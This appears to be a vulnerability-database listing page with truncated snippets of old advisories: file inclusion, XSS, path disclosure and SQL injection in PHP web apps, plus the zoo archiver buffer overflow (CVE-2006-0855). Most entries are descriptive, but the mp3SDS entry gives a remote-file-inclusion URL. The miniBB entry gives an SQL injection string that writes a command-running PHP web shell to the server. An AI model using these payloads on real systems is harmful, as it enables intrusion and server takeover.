Afian Local File Inclusion

Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system. This software has a secutity hole allow attackers download any files if they know the path...

Afian Document Manager Local File Inclusion

Afian is an application that can add, in just minutes, powerful document management capabilities to any Web server. It provides an Web-based interface for documents residing on the Web server's file system. This software has a secutity hole allow attackers download any files if they know the path...

spg-xss.txt

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;::...

mmgallery.txt

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;...

mmgallery Multiple vulnerabilities

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + + :::: :: ;;tt;;:: + + ;;:: ..,,:: ;;ii,,:: + + ,,,, ii;;,, ii;;:: ;;ii,,:: + + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: + + tt;;::..,, tt;;,, ff;;;;...

Cross site scripting & fullpath disclosure

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ;;ii,,:: + :::: :: ;;tt;;:: + ;;:: ..,,:: ;;ii,,:: + ,,,, ii;;,, ii;;:: ;;ii,,:: + ii:: tt;;,, ..tt;;,,.. ;;ii;;:: + ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: +...

mp3SDS 3.0 - '/Core/core.inc.php' Remote File Inclusion

Script: MP3 Streaming DownSampler for PHP v3.0 fullpath Remote File Include Exploit Version: 3.0 Script Download: http://damac.us/Projects/mp3SDS/archive/mp3SDS-3.0.tgz Code: requireonce"$fullpath/Core/FormatName.fnc.php"; Exploit: Core/core.inc.php?fullpath=evilscripts? Found: Cyber-Security...

ocs-1.1.3.txt

Open Conference Systems = 1.1.3 Remote File Inclusion Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; theme.inc.php footer.inc.php bugs ; at -- theme.inc.php...

Open Conference Systems <= 1.1.4 (fullpath) File Include Vulnerabilities

Exploit for unknown platform in category web applications ======================================================================== Open Conference Systems = 1.1.4 fullpath File Include Vulnerabilities ======================================================================== Open Conference Systems...

Open Conference Systems &lt;= 1.1.4 (fullpath) File Include Vulnerabilities

No description provided by source. Open Conference Systems = 1.1.3 Remote File Inclusion Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; theme.inc.php footer.inc.php bugs ; at -- theme.inc.php...

Open Conference Systems 1.1.4 - fullpath File Inclusion

Open Conference Systems 1.1.4 - fullpath File Inclusion Open Conference Systems = 1.1.3 Remote File Inclusion Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; theme.inc.php footer.inc.php bugs ; ...

Fullpath disclosure in Blue Magic Board 5.5

Blue Magic Board BMB is nice forum system written by http://bmforum.com Some file error and show fullpath. I test newest version, maybe all older versions are infected. http://domain.ext/bmbpath/footer.php http://domain.ext/bmbpath/header.php http://domain.ext/bmbpath/include/db/dbmysqlerror.php...

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team + SQL injection 1Vulnerable code in line 223 in links.php code : $rime =...

LinksCaffe30.txt

LinksCaffe 3.0 SQL injection/Command Execution Vulnerabilties Produce : LinksCaffe 3.0 Website : http://gonafish.com/ Impact : manupulation of data / system access Discovered by : Simo64 - Moroccan Security Team + SQL injection 1Vulnerable code in line 223 in links.php code : $rime =...

FLV Players Multiple Input Validation Vulnerabilities

Produce : FLV Players 8 Website : http://www.videospark.com + Fullpath Disclosure : 1 http://localhost/flv8/paginate.php Fatal error: Class simplepagemaker: Cannot inherit from undefined class object in /var/www/zero/httpdocs/flv8/paginate.php on line 45 2...

FLVPlayer8.txt

Produce : FLV Players 8 Website : http://www.videospark.com + Fullpath Disclosure : 1 http://localhost/flv8/paginate.php Fatal error: Class simplepagemaker: Cannot inherit from undefined class object in /var/www/zero/httpdocs/flv8/paginate.php on line 45 2...

SQL Injection: miniBB 2.0 RC6b

SQL Injection GET Не фильтруется параметр confirmCode. /index.php?action=confirmpasswd&confirmCode=f' union select '? passthru$GETcmd ?' from mysql.user INTO OUTFILE '/var/www/html/shell.php'/ Не фильтруется параметр post. /index.php?action=delmsg&post=1' union select 1,1 from mysql.user INTO...

Stack overflow

Stack-based buffer overflow in the fullpath function in misc.c for zoo 2.10 and earlier, as used in products such as Barracuda Spam Firewall, allows user-assisted attackers to execute arbitrary code via a crafted ZOO file that causes the combine function to return a longer string than expected...

CVE-2006-0855

Stack-based buffer overflow in the fullpath function in misc.c for zoo 2.10 and earlier, as used in products such as Barracuda Spam Firewall, allows user-assisted attackers to execute arbitrary code via a crafted ZOO file that causes the combine function to return a longer string than expected...

zoo -- stack based buffer overflow

Jean-Sébastien Guay-Leroux report a vulnerability within the zoo archiver. The vulnerability which is present in the fullpath function from the misc.c file is caused by improper checking of user supplied data. The data returned to the buffer can be up to 512 bytes, while the buffer is created to...